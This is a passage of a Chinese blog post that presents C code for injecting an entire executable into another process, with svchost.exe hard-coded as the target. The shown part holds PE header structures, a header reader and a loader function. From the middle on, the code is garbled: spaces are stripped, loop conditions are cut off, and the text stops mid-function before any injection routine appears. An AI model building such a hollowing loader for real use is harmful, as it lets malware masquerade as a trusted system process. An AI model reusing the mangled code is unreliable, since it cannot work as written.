进程空间中插入另一个进程的代码细节化
在进程空间中插入另一个进程的代码细节化
在 Inject DLL Into Process 的技术司空见惯的时代,江湖上出现了更令人惊讶的 Inject Thread Into Process 的技术,
不过这些 Injection 的功能多有局限性,如果可以 Inject EXE (Process) Into Process 该多好啊,习习~~其实 Inject EXE 的
技术早已不是什么新东西,只是原先的 Inject EXE 是 Linux/Unix 的东西,没有几个成功被改造成 Windows 版的......
*/
代码:
#include"stdafx.h"
#include"windows.h"
#include"tlhelp32.h"
#include"ntpsapi.h"
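// PE signature followed by the COFF file header, as stored in the file at
// MZHeader::offsetToPE. readPEInfo() fills this struct with a single fread(),
// so the in-memory layout must match the file layout byte for byte: the fields
// assume a 4-byte unsigned long and a 2-byte unsigned short (true for Windows
// compilers, not for LP64 targets).
// Every value here comes from the file and must be treated as untrusted.
struct PE_Header
{
    unsigned long  signature;
    unsigned short machine;
    unsigned short numSections;          // drives the section-table allocation in readPEInfo()
    unsigned long  timeDateStamp;
    unsigned long  pointerToSymbolTable;
    unsigned long  numOfSymbols;
    unsigned short sizeOfOptionHeader;   // readPEInfo() requires this to equal sizeof(PE_ExtHeader)
    unsigned short characteristics;
};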
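// Optional ("extended") header that follows PE_Header in the file, including
// the sixteen data-directory entries stored as address/size pairs.
// readPEInfo() reads it with one fread() and rejects any file whose
// sizeOfOptionHeader differs from sizeof(PE_ExtHeader), so only images with
// exactly this header layout are accepted.
// All fields are attacker-controllable file data: sizes, alignments and
// addresses must be range-checked before they are used for arithmetic,
// allocation or pointer offsets.
struct PE_ExtHeader
{
    unsigned short magic;
    unsigned char  majorLinkerVersion;
    unsigned char  minorLinkerVersion;
    unsigned long  sizeOfCode;
    unsigned long  sizeOfInitializedData;
    unsigned long  sizeOfUninitializedData;
    unsigned long  addressOfEntryPoint;
    unsigned long  baseOfCode;
    unsigned long  baseOfData;
    unsigned long  imageBase;
    unsigned long  sectionAlignment;     // used as a divisor when sizes are rounded up
    unsigned long  fileAlignment;
    unsigned short majorOSVersion;
    unsigned short minorOSVersion;
    unsigned short majorImageVersion;
    unsigned short minorImageVersion;
    unsigned short majorSubsystemVersion;
    unsigned short minorSubsystemVersion;
    unsigned long  reserved1;
    unsigned long  sizeOfImage;
    unsigned long  sizeOfHeaders;
    unsigned long  checksum;
    unsigned short subsystem;
    unsigned short DLLCharacteristics;
    unsigned long  sizeOfStackReserve;
    unsigned long  sizeOfStackCommit;
    unsigned long  sizeOfHeapReserve;
    unsigned long  sizeOfHeapCommit;
    unsigned long  loaderFlags;
    unsigned long  numberOfRVAAndSizes;

    // Data directories: one address/size pair each.
    unsigned long  exportTableAddress;
    unsigned long  exportTableSize;
    unsigned long  importTableAddress;
    unsigned long  importTableSize;
    unsigned long  resourceTableAddress;
    unsigned long  resourceTableSize;
    unsigned long  exceptionTableAddress;
    unsigned long  exceptionTableSize;
    unsigned long  certFilePointer;
    unsigned long  certTableSize;
    unsigned long  relocationTableAddress;
    unsigned long  relocationTableSize;
    unsigned long  debugDataAddress;
    unsigned long  debugDataSize;
    unsigned long  archDataAddress;
    unsigned long  archDataSize;
    unsigned long  globalPtrAddress;
    unsigned long  globalPtrSize;
    unsigned long  TLSTableAddress;
    unsigned long  TLSTableSize;
    unsigned long  loadConfigTableAddress;
    unsigned long  loadConfigTableSize;
    unsigned long  boundImportTableAddress;
    unsigned long  boundImportTableSize;
    unsigned long  importAddressTableAddress;
    unsigned long  importAddressTableSize;
    unsigned long  delayImportDescAddress;
    unsigned long  delayImportDescSize;
    unsigned long  COMHeaderAddress;
    unsigned long  COMHeaderSize;
    unsigned long  reserved2;
    unsigned long  reserved3;
};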
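// One entry of the section table that follows the optional header.
// readPEInfo() reads PE_Header::numSections of these straight from the file.
// virtualSize, sizeOfRawData and pointerToRawData are file-supplied values
// that later code uses as read lengths and file offsets, so they need to be
// validated against the file size and the destination buffer before use.
struct SectionHeader
{
    unsigned char  sectionName[8];       // fixed 8-byte field; not guaranteed to be NUL-terminated
    unsigned long  virtualSize;
    unsigned long  virtualAddress;
    unsigned long  sizeOfRawData;
    unsigned long  pointerToRawData;
    unsigned long  pointerToRelocations;
    unsigned long  pointerToLineNumbers;
    unsigned short numberOfRelocations;
    unsigned short numberOfLineNumbers;
    unsigned long  characteristics;
};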
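// DOS ("MZ") header found at offset 0 of the file. readPEInfo() reads it with
// one fread(), checks signature against 0x5a4d and then seeks to offsetToPE to
// find the PE header. offsetToPE is file-supplied and must be checked against
// the file size before it is used as a seek target.
struct MZHeader
{
    unsigned short signature;            // compared with 0x5a4d ("MZ") in readPEInfo()
    unsigned short partPag;
    unsigned short pageCnt;
    unsigned short reloCnt;
    unsigned short hdrSize;
    unsigned short minMem;
    unsigned short maxMem;
    unsigned short reloSS;
    unsigned short exeSP;
    unsigned short chksum;
    unsigned short exeIP;
    unsigned short reloCS;
    unsigned short tablOff;
    unsigned short overlay;
    unsigned char  reserved[32];
    unsigned long  offsetToPE;           // file offset of PE_Header
};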
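// One import-directory entry. Nothing in the visible part of the listing reads
// this struct; the field names suggest the on-disk import descriptor layout
// (NOTE(review): confirm against the code that walks the import table).
// The spelling "fowarderChain" is kept as-is because other code may refer to it.
struct ImportDirEntry
{
    DWORD importLookupTable;
    DWORD timeDateStamp;
    DWORD fowarderChain;
    DWORD nameRVA;
    DWORD importAddressTable;
};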
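// Header of one relocation (fixup) block: a page RVA and the size of the
// block. Not referenced in the visible part of the listing.
// NOTE(review): blockSize is file-supplied; whoever iterates fixup blocks
// should reject a blockSize smaller than sizeof(FixupBlock) so the walk
// always makes progress.
struct FixupBlock
{
    unsigned long pageRVA;
    unsigned long blockSize;
};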
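// Hard-coded process image name; the code that uses it is outside this excerpt.
// NOTE(review): the trailing ';' is part of the macro's replacement text, so it
// is pasted into every expansion. It is left in place because the use sites are
// not visible here; confirm whether they depend on it.
#define TARGETPROC "svchost.exe";

// Base address / image size pair. NOTE(review): presumably describes a mapped
// image in some process; the code that fills it is not visible in this excerpt.
typedef struct _PROCINFO
{
    DWORD baseAddr;
    DWORD imageSize;
} PROCINFO;

// NOTE(review): "False" is kept exactly as published; the Windows headers spell
// the constant FALSE, so this only compiles if "False" is defined elsewhere.
BOOL EXPD = False;
CHAR *PID;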
//**********************************************************************************************************
//
//ThisfunctionreadstheMZ,PE,PEextendedandSectionHeadersfromanEXEfile.
//
//**********************************************************************************************************
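// Reads and validates the MZ header, PE header, optional header and section
// table of the file open on fp.
//
//   fp         - stream positioned anywhere; it is rewound here.
//   outMZ      - receives the MZ header.
//   outPE      - receives the PE header.
//   outpeXH    - receives the optional (extended) header.
//   outSecHdr  - receives a new[]-allocated array of outPE->numSections
//                section headers; this function never frees it, so the
//                caller owns it and must delete[] it.
//
// Returns true on success. On failure it prints a message, returns false and
// leaves the out parameters untouched.
//
// The published listing lost the text after '<' in two size checks; they are
// reconstructed here from the surrounding messages. Every offset and count is
// file-supplied, so each one is checked against the file size before use and
// every fread() result is checked.
bool readPEInfo(FILE *fp, MZHeader *outMZ, PE_Header *outPE, PE_ExtHeader *outpeXH,
                SectionHeader **outSecHdr)
{
    if (fseek(fp, 0, SEEK_END) != 0)
    {
        printf("Unable to determine file size\n");
        return false;
    }
    long fileSize = ftell(fp);
    if (fileSize < 0 || fseek(fp, 0, SEEK_SET) != 0)
    {
        printf("Unable to determine file size\n");
        return false;
    }

    if ((unsigned long)fileSize < sizeof(MZHeader))
    {
        printf("File size too small\n");
        return false;
    }

    // read MZ Header
    MZHeader mzH;
    if (fread(&mzH, sizeof(MZHeader), 1, fp) != 1)
    {
        printf("Error reading MZ header\n");
        return false;
    }

    if (mzH.signature != 0x5a4d)    // MZ
    {
        printf("File does not have MZ header\n");
        return false;
    }

    printf("Offset to PE Header = %lX\n", mzH.offsetToPE);

    // Written as a subtraction so that a huge offsetToPE cannot wrap the sum
    // and slip past the check.
    if ((unsigned long)fileSize < sizeof(PE_Header) ||
        mzH.offsetToPE > (unsigned long)fileSize - sizeof(PE_Header))
    {
        printf("File size too small\n");
        return false;
    }

    // read PE Header
    if (fseek(fp, (long)mzH.offsetToPE, SEEK_SET) != 0)
    {
        printf("Error seeking to PE header\n");
        return false;
    }

    PE_Header peH;
    if (fread(&peH, sizeof(PE_Header), 1, fp) != 1)
    {
        printf("Error reading PE header\n");
        return false;
    }

    if (peH.signature != 0x00004550)    // "PE\0\0"
    {
        printf("File does not have PE signature\n");
        return false;
    }

    printf("Size of option header = %d\n", peH.sizeOfOptionHeader);
    printf("Number of sections = %d\n", peH.numSections);

    if (peH.sizeOfOptionHeader != sizeof(PE_ExtHeader))
    {
        printf("Unexpected option header size.\n");
        return false;
    }

    // read PE Ext Header
    PE_ExtHeader peXH;
    if (fread(&peXH, sizeof(PE_ExtHeader), 1, fp) != 1)
    {
        printf("Error reading PE extended header\n");
        return false;
    }

    printf("Import table address = %lX\n", peXH.importTableAddress);
    printf("Import table size = %lX\n", peXH.importTableSize);
    printf("Import address table address = %lX\n", peXH.importAddressTableAddress);
    printf("Import address table size = %lX\n", peXH.importAddressTableSize);

    // read the sections
    // numSections is file-supplied: make sure the whole table lies inside the
    // file before allocating and reading it.
    long tableStart = ftell(fp);
    unsigned long tableBytes = (unsigned long)peH.numSections * sizeof(SectionHeader);
    if (tableStart < 0 || tableStart > fileSize ||
        tableBytes > (unsigned long)(fileSize - tableStart))
    {
        printf("File size too small\n");
        return false;
    }

    SectionHeader *secHdr = new SectionHeader[peH.numSections];

    if (fread(secHdr, sizeof(SectionHeader), peH.numSections, fp) != peH.numSections)
    {
        printf("Error reading section headers\n");
        delete[] secHdr;
        return false;
    }

    *outMZ = mzH;
    *outPE = peH;
    *outpeXH = peXH;
    *outSecHdr = secHdr;

    return true;
}

//**********************************************************************************************************
//
// This function calculates the size required to load an EXE into memory with proper alignment.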
// //********************************************************************************************************** intcalcTotalImageSize(MZHeader*inMZ,PE_Header*inPE,PE_ExtHeader*inpeXH, SectionHeader*inSecHdr) { intresult=0; intalignment=inpeXH->sectionAlignment; if(inpeXH->sizeOfHeaders%alignment==0) result+=inpeXH->sizeOfHeaders; else { intval=inpeXH->sizeOfHeaders/alignment; val++; result+=(val*alignment); } for(inti=0;i { if(inSecHdr[i].virtualSize) { if(inSecHdr[i].virtualSize%alignment==0) result+=inSecHdr[i].virtualSize; else { intval=inSecHdr[i].virtualSize/alignment; val++; result+=(val*alignment); } } } returnresult; } //********************************************************************************************************** // //Thisfunctioncalculatesthealignedsizeofasection // //********************************************************************************************************** unsignedlonggetAlignedSize(unsignedlongcurSize,unsignedlongalignment) { if(curSize%alignment==0) returncurSize; else { intval=curSize/alignment; val++; return(val*alignment); } } //********************************************************************************************************** // //ThisfunctionloadsaPEfileintomemorywithproperalignment. //EnoughmemorymustbeallocatedatptrLoc. // //********************************************************************************************************** boolloadPE(FILE*fp,MZHeader*inMZ,PE_Header*inPE,PE_ExtHeader*inpeXH, SectionHeader*inSecHdr,LPVOIDptrLoc) { char*outPtr=(char*)ptrLoc; fseek(fp,0,SEEK_SET); unsignedlongheaderSize=inpeXH->sizeOfHeaders; //certainPEfileshavesectionHeaderSizevalue>sizeofPEfileitself. //thisloophandlesthissituationbyfindthesectionthatisnearesttothe //PEheader. for(inti=0;i { if(inSecHdr[i].pointerToRawData headerSize=inSecHdr[i].pointerToRawData; } //readthePEheader unsignedlongreadSize=fread(outPtr,1,headerSize,fp); printf("HeaderSize=%d\n",headerSize); if(readSize! 
=headerSize) { printf("Errorreadingheaders(%d%d)\n",readSize,headerSize); returnfalse; } outPtr+=getAlignedSize(inpeXH->sizeOfHeaders,inpeXH->sectionAlignment); //readthesections for(i=0;i { if(inSecHdr[i].sizeOfRawData>0) { unsignedlongtoRead=inSecHdr[i].sizeOfRawData; if(toRead>inSecHdr[i].virtualSize) toRead=inSecHdr[i].virtualSize; fseek(fp,inSecHdr[i].pointerToRawData,SEEK_SET); readSize=fread(outPtr,1,toRead,fp); if(readSize! =toRead) { printf("Errorreadingsection%d\n",i); returnfalse; } outPtr+=getAlignedSize(inSecHdr[i].virtualSize,inpeXH->sectionAlignment); } else { //thishandlesthe